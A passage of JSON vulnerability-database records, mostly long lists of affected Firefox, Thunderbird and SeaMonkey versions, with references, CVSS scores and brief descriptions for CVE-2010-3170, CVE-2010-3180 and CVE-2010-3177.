"cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3170", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3170", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://www.redhat.com/support/errata/RHSA-2010-0781.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.securityfocus.com/bid/44248", "http://support.avaya.com/css/P8/documents/100114250", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=588929", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.redhat.com/support/errata/RHSA-2010-0780.html", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Use-after-free vulnerability in the nsBarProp function in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 allows remote attackers to execute arbitrary code by accessing the locationbar property of a closed window.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3180", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12158", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12158"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3180"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12158", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12158"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3180", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3180", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://www.redhat.com/support/errata/RHSA-2010-0781.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://support.avaya.com/css/P8/documents/100114250", "http://www.ubuntu.com/usn/USN-997-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "https://bugzilla.mozilla.org/show_bug.cgi?id=556734", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Multiple cross-site scripting (XSS) vulnerabilities in the Gopher parser in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, and SeaMonkey before 2.0.9, allow remote attackers to inject arbitrary web script or HTML via a crafted name of a (1) file or (2) directory on a Gopher server.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3177", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12202", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12202"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3177"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12202", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12202"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", 